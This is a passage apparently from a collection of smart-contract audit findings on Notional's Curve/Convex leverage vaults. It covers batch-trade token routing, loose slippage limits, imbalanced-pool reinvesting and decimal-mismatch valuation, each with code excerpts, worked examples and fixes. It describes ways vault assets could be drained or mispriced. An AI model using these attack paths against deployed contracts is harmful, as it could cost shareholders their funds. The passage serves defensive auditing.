pools,\\n address(this)\\n );\\n```\\n\\nCurveAdapter\\n```\\nFile: CurveAdapter.sol\\n function _exactInBatch(Trade memory trade) internal view returns (bytes memory executionCallData) {\\n CurveBatchData memory data = abi.decode(trade.exchangeData, (CurveBatchData));\\n\\n return abi.encodeWithSelector(\\n ICurveRouter.exchange.selector,\\n trade.amount,\\n data.route,\\n data.indices,\\n trade.limit\\n );\\n }\\n```\\n\\nFollowing are some examples of where this vulnerability could potentially be exploited. Assume a vault that supports the CurveV2's ETH/stETH pool.\\nPerform the smallest possible redemption to trigger the `_sellSecondaryBalance` function. Configure the `RedeemParams` to swap the reward token (CRV, CVX, or LDO) or Convex Deposit token for the primary token (ETH). This will cause the `finalPrimaryBalance` to increase by the number of incoming primary tokens (ETH), thus inflating the number of primary tokens redeemed.\\nPerform the smallest possible deposit to trigger the `_tradePrimaryForSecondary`. Configure `DepositTradeParams` to swap the reward token (CRV, CVX, or LDO) or Convex Deposit token for the secondary tokens (stETH). This will cause the `secondaryAmount` to increase by the number of incoming secondary tokens (stETH), thus inflating the number of secondary tokens available for the deposit.\\nUpon further investigation, it was observed that the vault would only approve the exchange to pull the `trade.sellToken`, which points to either the primary token (ETH) or secondary token (stETH). Thus, the reward tokens (CRV, CVX, or LDO) or Convex deposit tokens cannot be sent to the exchanges. Thus, the vault will not be affected if none of the reward tokens/Convex Deposit tokens equals the primary or secondary token.\\n```\\nFile: TradingUtils.sol\\n /// @notice Approve exchange to pull from this contract\\n /// @dev approve up to trade.amount for EXACT_IN trades and up to trade.limit\\n /// for EXACT_OUT trades\\n function _approve(Trade memory trade, address spender) private {\\n uint256 allowance = _isExactIn(trade) ? trade.amount : trade.limit;\\n address sellToken = trade.sellToken;\\n // approve WETH instead of ETH for ETH trades if\\n // spender != address(0) (checked by the caller)\\n if (sellToken == Constants.ETH_ADDRESS) {\\n sellToken = address(Deployments.WETH);\\n }\\n IERC20(sellToken).checkApprove(spender, allowance);\\n }\\n```\\n\\nHowever, there might be some Curve Pools or Convex's reward contracts whose reward tokens are similar to the primary or secondary tokens of the vault. If the vault supports those pools, the vault will be vulnerable. In addition, the reward tokens of a Curve pool or Convex's reward contracts are not immutable. It is possible for the governance to add a new reward token that might be the same as the primary or secondary token.
It is recommended to implement additional checks when performing a `EXACT_IN_BATCH` trade with the `CurveV2Adapter` or `CurveAdapter` adaptor. The first item in the route must be the `trade.sellToken`, and the last item in the route must be the `trade.buyToken`. This will restrict the `trade.sellToken` to the primary or secondary token, and prevent reward and Convex Deposit tokens from being sold (Assuming primary/secondary token != reward tokens).\\n```\\nroute[0] == trade.sellToken\\nroute[last index] == trade.buyToken\\n```\\n\\nThe vault holds many Convex Deposit tokens (e.g. cvxsteCRV). A risk analysis of the vault shows that the worst thing that could happen is that all the Convex Deposit tokens are swapped away if a new exploit is found, which would drain the entire vault. For defense-in-depth, it is recommended to check that the selling token is not a Convex Deposit token under any circumstance when using the trade adaptor.\\nThe trade adaptors are one of the attack vectors that the attacker could potentially use to move tokens out of the vault if any exploit is found. Thus, they should be locked down or restricted where possible.\\nAlternatively, consider removing the `EXACT_IN_BATCH` trade function from the affected adaptors to reduce the attack surface if the security risk of this feature outweighs the benefit of the batch function.
There is a risk that the reward tokens or Convex deposit tokens of the vault are sold by malicious users under certain conditions (e.g. if reward tokens are equal to primary/secondary tokens OR a new exploit is found in other parts of the code), thus potentially draining assets from the vault.
```\\nFile: CurveV2Adapter.sol\\n function getExecutionData(address from, Trade calldata trade)\\n internal view returns (\\n address spender,\\n address target,\\n uint256 msgValue,\\n bytes memory executionCallData\\n )\\n {\\n if (trade.tradeType == TradeType.EXACT_IN_SINGLE) {\\n CurveV2SingleData memory data = abi.decode(trade.exchangeData, (CurveV2SingleData));\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange.selector,\\n data.pool,\\n _getTokenAddress(trade.sellToken),\\n _getTokenAddress(trade.buyToken),\\n trade.amount,\\n trade.limit,\\n address(this)\\n );\\n } else if (trade.tradeType == TradeType.EXACT_IN_BATCH) {\\n CurveV2BatchData memory data = abi.decode(trade.exchangeData, (CurveV2BatchData));\\n // Array of pools for swaps via zap contracts. This parameter is only needed for\\n // Polygon meta-factories underlying swaps.\\n address[4] memory pools;\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange_multiple.selector,\\n data.route,\\n data.swapParams,\\n trade.amount,\\n trade.limit,\\n pools,\\n address(this)\\n );\\n```\\n
Slippage/Minimum amount does not work during single-side redemption
high
The slippage or minimum amount of tokens to be received is set to a value much smaller than expected due to the use of `TwoTokenPoolUtils._getMinExitAmounts` function to automatically compute the slippage or minimum amount on behalf of the callers during a single-sided redemption. As a result, the vault will continue to redeem the pool tokens even if the trade incurs significant slippage, resulting in the vault receiving fewer tokens in return, leading to losses for the vault shareholders.\\nThe `Curve2TokenConvexHelper._executeSettlement` function is called by the following functions:\\n`Curve2TokenConvexHelper.settleVault`\\n`Curve2TokenConvexHelper.settleVault` function is called within the `Curve2TokenConvexVault.settleVaultNormal` and `Curve2TokenConvexVault.settleVaultPostMaturity` functions\\n`Curve2TokenConvexHelper.settleVaultEmergency`\\n`Curve2TokenConvexHelper.settleVaultEmergency` is called by `Curve2TokenConvexVault.settleVaultEmergency`\\nIn summary, the `Curve2TokenConvexHelper._executeSettlement` function is called during vault settlement.\\nAn important point to note here is that within the `Curve2TokenConvexHelper._executeSettlement` function, the `params.minPrimary` and `params.minSecondary` are automatically computed and overwritten by the `TwoTokenPoolUtils._getMinExitAmounts` function (Refer to Line 124 below). Therefore, if the caller attempts to define the `params.minPrimary` and `params.minSecondary`, they will be discarded and overwritten. The `params.minPrimary` and `params.minSecondary` is for slippage control when redeeming the Curve's LP tokens.\\n```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n\\nThe `TwoTokenPoolUtils._getMinExitAmounts` function calculates the minimum amount on the share of the pool with a small discount.\\nAssume a Curve Pool with the following configuration:\\nConsist of two tokens (DAI and USDC). DAI is primary token, USDC is secondary token.\\nPool holds 200 US Dollars worth of tokens (50 DAI and 150 USDC).\\nDAI <> USDC price is 1:1\\ntotalSupply = 100 LP Pool Tokens\\nAssume that 50 LP Pool Tokens will be claimed during vault settlement.\\n```\\nminPrimary = (poolContext.primaryBalance * poolClaim * strategyContext.vaultSettings.poolSlippageLimitPercent / (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS)\\nminPrimary = (50 DAI * 50 LP_TOKEN * 99.75% / (100 LP_TOKEN * 100%)\\n\\nRewrite for clarity (ignoring rounding error):\\nminPrimary = 50 DAI * (50 LP_TOKEN/100 LP_TOKEN) * (99.75%/100%) = 24.9375 DAI\\n\\nminSecondary = same calculation = 74.8125 USDC\\n```\\n\\n`TwoTokenPoolUtils._getMinExitAmounts` function will return `24.9375 DAI` as `params.minPrimary` and `74.8125 USDC` as `params.minSecondary`.\\n```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice calculates the expected primary and secondary amounts based on\\n /// the given spot price and oracle price\\n function _getMinExitAmounts(\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext calldata strategyContext,\\n uint256 spotPrice,\\n uint256 oraclePrice,\\n uint256 poolClaim\\n ) internal view returns (uint256 minPrimary, uint256 minSecondary) {\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n\\n // min amounts are calculated based on the share of the Balancer pool with a small discount applied\\n uint256 totalPoolSupply = poolContext.poolToken.totalSupply();\\n minPrimary = (poolContext.primaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / \\n (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS));\\n minSecondary = (poolContext.secondaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / \\n (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS));\\n }\\n```\\n\\nWhen settling the vault, it is possible to instruct the vault to redeem the Curve's LP tokens single-sided or proportionally. Settle vault functions will trigger a chain of functions that will eventually call the `Curve2TokenConvexHelper._unstakeAndExitPool` function that is responsible for redeeming the Curve's LP tokens.\\nWithin the `Curve2TokenConvexHelper._unstakeAndExitPool` function, if the `params.secondaryTradeParams.length` is zero, the redemption will be single-sided (refer to Line 242 below). Otherwise, the redemption will be executed proportionally (refer to Line 247 below). For a single-sided redemption, only the `params.minPrimary` will be used.\\n```\\nFile: Curve2TokenPoolUtils.sol\\n function _unstakeAndExitPool(\\n Curve2TokenPoolContext memory poolContext,\\n ConvexStakingContext memory stakingContext,\\n uint256 poolClaim,\\n RedeemParams memory params\\n ) internal returns (uint256 primaryBalance, uint256 secondaryBalance) {\\n // Withdraw pool tokens back to the vault for redemption\\n bool success = stakingContext.rewardPool.withdrawAndUnwrap(poolClaim, false); // claimRewards = false\\n if (!success) revert Errors.UnstakeFailed();\\n\\n if (params.secondaryTradeParams.length == 0) {\\n // Redeem single-sided\\n primaryBalance = ICurve2TokenPool(address(poolContext.curvePool)).remove_liquidity_one_coin(\\n poolClaim, int8(poolContext.basePool.primaryIndex), params.minPrimary\\n );\\n } else {\\n // Redeem proportionally\\n uint256[2] memory minAmounts;\\n minAmounts[poolContext.basePool.primaryIndex] = params.minPrimary;\\n minAmounts[poolContext.basePool.secondaryIndex] = params.minSecondary;\\n uint256[2] memory exitBalances = ICurve2TokenPool(address(poolContext.curvePool)).remove_liquidity(\\n poolClaim, minAmounts\\n );\\n\\n (primaryBalance, secondaryBalance) \\n = (exitBalances[poolContext.basePool.primaryIndex], exitBalances[poolContext.basePool.secondaryIndex]);\\n }\\n }\\n```\\n\\nAssume that the caller decided to perform a single-sided redemption of 50 LP Pool Tokens, using the earlier example. In this case,\\n`poolClaim` = 50 LP Pool Tokens\\n`params.minPrimary` = 24.9375 DAI\\n`params.minSecondary` = 74.8125 USDC\\nThe data passed into the `remove_liquidity_one_coin` will be as follows:\\n```\\n@notice Withdraw a single coin from the pool\\n@param _token_amount Amount of LP tokens to burn in the withdrawal\\n@param i Index value of the coin to withdraw\\n@param _min_amount Minimum amount of coin to receive\\n@return Amount of coin received\\ndef remove_liquidity_one_coin(\\n _token_amount: uint256,\\n i: int128,\\n _min_amount: uint256\\n) -> uint256:\\n```\\n\\n```\\nremove_liquidity_one_coin(poolClaim, int8(poolContext.basePool.primaryIndex), params.minPrimary);\\nremove_liquidity_one_coin(50 LP_TOKEN, Index 0=DAI, 24.9375 DAI);\\n```\\n\\nAssume the pool holds 200 US dollars worth of tokens (50 DAI and 150 USDC), and the total supply is 100 LP Tokens. The pool's state is imbalanced, so any trade will result in significant slippage.\\nIntuitively (ignoring the slippage & fee), redeeming 50 LP Tokens should return approximately 100 US dollars worth of tokens, which means around 100 DAI. Thus, the slippage or minimum amount should ideally be around 100 DAI (+/- 5%).\\nHowever, the trade will be executed in the above example even if the vault receives only 25 DAI because the `params.minPrimary` is set to `24.9375 DAI`. This could result in a loss of around 75 DAI due to slippage (about 75% slippage rate) in the worst-case scenario.
When performing a single-side redemption, avoid using the `TwoTokenPoolUtils._getMinExitAmounts` function to automatically compute the slippage or minimum amount of tokens to receive on behalf of the caller. Instead, give the caller the flexibility to define the slippage (params.minPrimary). To prevent the caller from setting a slippage that is too large, consider restricting the slippage to an acceptable range.\\nThe proper way of computing the minimum amount of tokens to receive from a single-side trade (remove_liquidity_one_coin) is to call the Curve Pool's `calc_withdraw_one_coin` function off-chain to calculate the amount received when withdrawing a single LP Token, and then apply an acceptable discount.\\nNote that the `calc_withdraw_one_coin` function cannot be used solely on-chain for computing the minimum amount because the result can be manipulated since it uses spot balances for computation.
The slippage or minimum amount of tokens to be received is set to a value much smaller than expected. Thus, the vault will continue to redeem the pool tokens even if the trade incurs significant slippage, resulting in the vault receiving fewer tokens in return, leading to losses for the vault shareholders.
```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n
Reinvest will return sub-optimal return if the pool is imbalanced
high
Reinvesting only allows proportional deposit. If the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal. This result in fewer pool tokens in return due to sub-optimal trade, eventually leading to a loss of gain for the vault shareholder.\\nDuring reinvest rewards, the vault will ensure that the amount of primary and secondary tokens deposited is of the right proportion per the comment in Line 163 below.\\n```\\nFile: Curve2TokenConvexHelper.sol\\n function reinvestReward(\\n Curve2TokenConvexStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external {\\n..SNIP..\\n // Make sure we are joining with the right proportion to minimize slippage\\n poolContext._validateSpotPriceAndPairPrice({\\n strategyContext: strategyContext,\\n oraclePrice: poolContext.basePool._getOraclePairPrice(strategyContext),\\n primaryAmount: primaryAmount,\\n secondaryAmount: secondaryAmount\\n });\\n```\\n\\nThe `Curve2TokenConvexHelper.reinvestReward` function will internally call the `Curve2TokenPoolUtils._checkPrimarySecondaryRatio`, which will check that the primary and secondary tokens deposited are of the right proportion.\\n```\\nFile: Curve2TokenPoolUtils.sol\\n function _checkPrimarySecondaryRatio(\\n StrategyContext memory strategyContext,\\n uint256 primaryAmount, \\n uint256 secondaryAmount, \\n uint256 primaryPoolBalance, \\n uint256 secondaryPoolBalance\\n ) private pure {\\n uint256 totalAmount = primaryAmount + secondaryAmount;\\n uint256 totalPoolBalance = primaryPoolBalance + secondaryPoolBalance;\\n\\n uint256 primaryPercentage = primaryAmount * CurveConstants.CURVE_PRECISION / totalAmount; \\n uint256 expectedPrimaryPercentage = primaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n strategyContext._checkPriceLimit(expectedPrimaryPercentage, primaryPercentage);\\n\\n uint256 secondaryPercentage = secondaryAmount * CurveConstants.CURVE_PRECISION / totalAmount;\\n uint256 expectedSecondaryPercentage = secondaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n strategyContext._checkPriceLimit(expectedSecondaryPercentage, secondaryPercentage);\\n }\\n```\\n\\nThis concept of proportional join appears to be taken from the design of earlier Notional's Balancer leverage vaults. For Balancer Pools, it is recommended to join with all the pool's tokens in exact proportions to minimize the price impact of the join (Reference).\\nHowever, the concept of proportional join to minimize slippage does not always hold for Curve Pools as they operate differently.\\nA Curve pool is considered imbalanced when there is an imbalance between the assets within it. For instance, the Curve stETH/ETH pool is considered imbalanced if it has the following reserves:\\nETH: 340,472.34 (31.70%)\\nstETH: 733,655.65 (68.30%)\\nIf a Curve Pool is imbalanced, attempting to perform a proportional join will not give an optimal return (e.g. result in fewer Pool LP tokens received).\\nIn Curve Pool, there are penalties/bonuses when depositing to a pool. The pools are always trying to balance themselves. If a deposit helps the pool to reach that desired balance, a deposit bonus will be given (receive extra tokens). On the other hand, if a deposit deviates from the pool from the desired balance, a deposit penalty will be applied (receive fewer tokens).\\n```\\ndef add_liquidity(amounts: uint256[N_COINS], min_mint_amount: uint256) -> uint256:\\n..SNIP..\\n if token_supply > 0:\\n # Only account for fees if we are not the first to deposit\\n fee: uint256 = self.fee * N_COINS / (4 * (N_COINS - 1))\\n admin_fee: uint256 = self.admin_fee\\n for i in range(N_COINS):\\n ideal_balance: uint256 = D1 * old_balances[i] / D0\\n difference: uint256 = 0\\n if ideal_balance > new_balances[i]:\\n difference = ideal_balance - new_balances[i]\\n else:\\n difference = new_balances[i] - ideal_balance\\n fees[i] = fee * difference / FEE_DENOMINATOR\\n if admin_fee != 0:\\n self.admin_balances[i] += fees[i] * admin_fee / FEE_DENOMINATOR\\n new_balances[i] -= fees[i]\\n D2 = self.get_D(new_balances, amp)\\n mint_amount = token_supply * (D2 - D0) / D0\\n else:\\n mint_amount = D1 # Take the dust if there was any\\n..SNIP..\\n```\\n\\nFollowing is the mathematical explanation of the penalties/bonuses extracted from Curve's Discord channel:\\nThere is a “natural” amount of D increase that corresponds to a given total deposit amount; when the pool is perfectly balanced, this D increase is optimally achieved by a balanced deposit. Any other deposit proportions for the same total amount will give you less D.\\nHowever, when the pool is imbalanced, a balanced deposit is no longer optimal for the D increase.
Consider removing the `_checkPrimarySecondaryRatio` function from the `_validateSpotPriceAndPairPrice` function to give the callers the option to deposit the reward tokens in a "non-proportional" manner if a Curve Pool becomes imbalanced so that the deposit penalty could be minimized or the deposit bonus can be exploited to increase the return.
There is no guarantee that a Curve Pool will always be balanced. Historically, there are multiple instances where the largest Curve pool (stETH/ETH) becomes imbalanced (Reference #1 and #2).\\nIf the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal, leading to the trade resulting in fewer tokens than possible due to the deposit penalty. In addition, the trade also misses out on the potential gain from the deposit bonus.\\nThe side-effect is that reinvesting the reward tokens will result in fewer pool tokens in return due to sub-optimal trade, eventually leading to a loss of gain for the vault shareholder.
```\\nFile: Curve2TokenConvexHelper.sol\\n function reinvestReward(\\n Curve2TokenConvexStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external {\\n..SNIP..\\n // Make sure we are joining with the right proportion to minimize slippage\\n poolContext._validateSpotPriceAndPairPrice({\\n strategyContext: strategyContext,\\n oraclePrice: poolContext.basePool._getOraclePairPrice(strategyContext),\\n primaryAmount: primaryAmount,\\n secondaryAmount: secondaryAmount\\n });\\n```\\n
Curve vault will undervalue or overvalue the LP Pool tokens if it comprises tokens with different decimals
high
A Curve vault that comprises tokens with different decimals will undervalue or overvalue the LP Pool tokens. As a result, users might be liquidated prematurely or be able to borrow more than they are allowed. Additionally, the vault settlement process might break.\\nThe `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function, which is utilized by the Curve vault, is used to compute the total value of the LP Pool tokens (poolClaim) denominated in the primary token.\\n```\\nFile: TwoTokenPoolUtils.sol\\n function _getTimeWeightedPrimaryBalance(\\n TwoTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n uint256 poolClaim,\\n uint256 oraclePrice,\\n uint256 spotPrice\\n ) internal view returns (uint256 primaryAmount) {\\n // Make sure spot price is within oracleDeviationLimit of pairPrice\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n \\n // Get shares of primary and secondary balances with the provided poolClaim\\n uint256 totalSupply = poolContext.poolToken.totalSupply();\\n uint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n uint256 secondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply;\\n\\n // Value the secondary balance in terms of the primary token using the oraclePairPrice\\n uint256 secondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\n\\n // Make sure primaryAmount is reported in primaryPrecision\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n primaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n }\\n```\\n\\nIf a leverage vault supports a Curve Pool that contains two tokens with different decimals, the math within the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function would not work, and the value returned from it will be incorrect. Consider the following two scenarios:\\nIf primary token's decimals (e.g. 18) > secondary token's decimals (e.g. 6)\\nTo illustrate the issue, assume the following:\\nThe leverage vault supports the DAI-USDC Curve Pool, and its primary token of the vault is DAI.\\nDAI's decimals are 18, while USDC's decimals are 6.\\nCurve Pool's total supply is 100\\nThe Curve Pool holds 100 DAI and 100 USDC\\nFor the sake of simplicity, the price of DAI and USDC is 1:1. Thus, the `oraclePrice` within the function will be `1 * 10^18`. Note that the oracle price is always scaled up to 18 decimals within the vault.\\nThe caller of the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function wanted to compute the total value of 50 LP Pool tokens.\\n```\\nprimaryBalance = poolContext.primaryBalance * poolClaim / totalSupply; // 100 DAI * 50 / 100\\nsecondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply; // 100 USDC * 50 / 100\\n```\\n\\nThe `primaryBalance` will be `50 DAI`. `50 DAI` denominated in WEI will be `50 * 10^18` since the decimals of DAI are 18.\\nThe `secondaryBalance` will be `50 USDC`. `50 USDC` denominated in WEI will be `50 * 10^6` since the decimals of USDC are 6.\\nNext, the code logic attempts to value the secondary balance (50 USDC) in terms of the primary token (DAI) using the oracle price (1 * 10^18).\\n```\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = 50 USDC * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^6\\n```\\n\\n50 USDC should be worth 50 DAI (50 * 10^18). However, the `secondaryAmountInPrimary` shows that it is only worth 0.00000000005 DAI (50 * 10^6).\\n```\\nprimaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\nprimaryAmount = [(50 * 10^18) + (50 * 10^6)] * 10^18 / 10^18\\nprimaryAmount = [(50 * 10^18) + (50 * 10^6)] // cancel out the 10^18\\nprimaryAmount = 50 DAI + 0.00000000005 DAI = 50.00000000005 DAI\\n```\\n\\n50 LP Pool tokens should be worth 100 DAI. However, the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function shows that it is only worth 50.00000000005 DAI, which undervalues the LP Pool tokens.\\nIf primary token's decimals (e.g. 6) < secondary token's decimals (e.g. 18)\\nTo illustrate the issue, assume the following:\\nThe leverage vault supports the DAI-USDC Curve Pool, and its primary token of the vault is USDC.\\nUSDC's decimals are 6, while DAI's decimals are 18.\\nCurve Pool's total supply is 100\\nThe Curve Pool holds 100 USDC and 100 DAI\\nFor the sake of simplicity, the price of DAI and USDC is 1:1. Thus, the `oraclePrice` within the function will be `1 * 10^18`. Note that the oracle price is always scaled up to 18 decimals within the vault.\\nThe caller of the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function wanted to compute the total value of 50 LP Pool tokens.\\n```\\nprimaryBalance = poolContext.primaryBalance * poolClaim / totalSupply; // 100 USDC * 50 / 100\\nsecondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply; // 100 DAI * 50 / 100\\n```\\n\\nThe `primaryBalance` will be `50 USDC`. `50 USDC` denominated in WEI will be `50 * 10^6` since the decimals of USDC are 6.\\nThe `secondaryBalance` will be `50 DAI`. `50 DAI` denominated in WEI will be `50 * 10^18` since the decimals of DAI are 18.\\nNext, the code logic attempts to value the secondary balance (50 DAI) in terms of the primary token (USDC) using the oracle price (1 * 10^18).\\n```\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = 50 DAI * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^18) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^18\\n```\\n\\n50 DAI should be worth 50 USDC (50 * 10^6). However, the `secondaryAmountInPrimary` shows that it is worth 50,000,000,000,000 USDC (50 * 10^18).\\n```\\nprimaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\nprimaryAmount = [(50 * 10^6) + (50 * 10^18)] * 10^6 / 10^18\\nprimaryAmount = [(50 * 10^6) + (50 * 10^18)] / 10^12\\nprimaryAmount = 50,000,000.00005 = 50 million\\n```\\n\\n50 LP Pool tokens should be worth 100 USDC. However, the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function shows that it is worth 50 million USDC, which overvalues the LP Pool tokens.\\nIn summary, if a leverage vault has two tokens with different decimals:\\nIf primary token's decimals (e.g. 18) > secondary token's decimals (e.g. 6), then `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function will undervalue the LP Pool tokens\\nIf primary token's decimals (e.g. 6) < secondary token's decimals (e.g. 18), then `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function will overvalue the LP Pool tokens
When valuing the secondary balance in terms of the primary token using the oracle price, the result should be scaled up or down the decimals of the primary token accordingly if the decimals of the two tokens are different.\\nThe root cause of this issue is in the following portion of the code, which attempts to add the `primaryBalance` and `secondaryAmountInPrimary` before multiplying with the `primaryPrecision`. The `primaryBalance` and `secondaryAmountInPrimary` might not be denominated in the same decimals. Therefore, they cannot be added together without scaling them if the decimals of two tokens are different.\\n```\\nprimaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n```\\n\\nConsider implementing the following changes to ensure that the math within the `_getTimeWeightedPrimaryBalance` function work with tokens with different decimals. The below approach will scale the secondary token to match the primary token's precision before performing further computation.\\n```\\nfunction _getTimeWeightedPrimaryBalance(\\n TwoTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n uint256 poolClaim,\\n uint256 oraclePrice,\\n uint256 spotPrice\\n) internal view returns (uint256 primaryAmount) {\\n // Make sure spot price is within oracleDeviationLimit of pairPrice\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n \\n // Get shares of primary and secondary balances with the provided poolClaim\\n uint256 totalSupply = poolContext.poolToken.totalSupply();\\n uint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n uint256 secondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply;\\n\\n// Add the line below\\n // Scale secondary balance to primaryPrecision\\n// Add the line below\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n// Add the line below\\n uint256 secondaryPrecision = 10 ** poolContext.secondaryDecimals;\\n// Add the line below\\n secondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision\\n \\n // Value the secondary balance in terms of the primary token using the oraclePairPrice\\n uint256 secondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\n \\n// Remove the line below\\n // Make sure primaryAmount is reported in primaryPrecision\\n// Remove the line below\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n// Remove the line below\\n primaryAmount = (primaryBalance // Add the line below\\n secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n// Add the line below\\n primaryAmount = primaryBalance // Add the line below\\n secondaryAmountInPrimary\\n}\\n```\\n\\nThe `poolContext.primaryBalance` or `poolClaim` are not scaled up to `strategyContext.poolClaimPrecision`. Thus, the `primaryBalance` is not scaled in any form. Thus, I do not see the need to perform any conversion at the last line of the `_getTimeWeightedPrimaryBalance` function.\\n```\\nuint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n```\\n\\nThe following attempts to run through the examples in the previous section showing that the updated function produces valid results after the changes.\\nIf primary token's decimals (e.g. 18) > secondary token's decimals (e.g. 6)\\n```\\nPrimary Balance = 50 DAI (18 Deci), Secondary Balance = 50 USDC (6 Deci)\\n\\nsecondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision\\nsecondaryBalance = 50 USDC * 10^18 / 10^6\\nsecondaryBalance = (50 * 10^6) * 10^18 / 10^6 = (50 * 10^18)\\n\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = (50 * 10^18) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^18) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^18\\n\\nprimaryAmount = primaryBalance + secondaryAmountInPrimary\\nprimaryAmount = (50 * 10^18) + (50 * 10^18) = (100 * 10^18) = 100 DAI\\n```\\n\\nIf primary token's decimals (e.g. 6) < secondary token's decimals (e.g. 18)\\n```\\nPrimary Balance = 50 USDC (6 Deci), Secondary Balance = 50 DAI (18 Deci)\\n\\nsecondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision\\nsecondaryBalance = 50 DAI * 10^6 / 10^18\\nsecondaryBalance = (50 * 10^18) * 10^6 / 10^18 = (50 * 10^6)\\n\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^6\\n\\nprimaryAmount = primaryBalance + secondaryAmountInPrimary\\nprimaryAmount = (50 * 10^6) + (50 * 10^6) = (100 * 10^6) = 100 USDC\\n```\\n\\nIf primary token's decimals (e.g. 6) == secondary token's decimals (e.g. 6)\\n```\\nPrimary Balance = 50 USDC (6 Deci), Secondary Balance = 50 USDT (6 Deci)\\n\\nsecondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision\\nsecondaryBalance = 50 USDT * 10^6 / 10^6\\nsecondaryBalance = (50 * 10^6) * 10^6 / 10^6 = (50 * 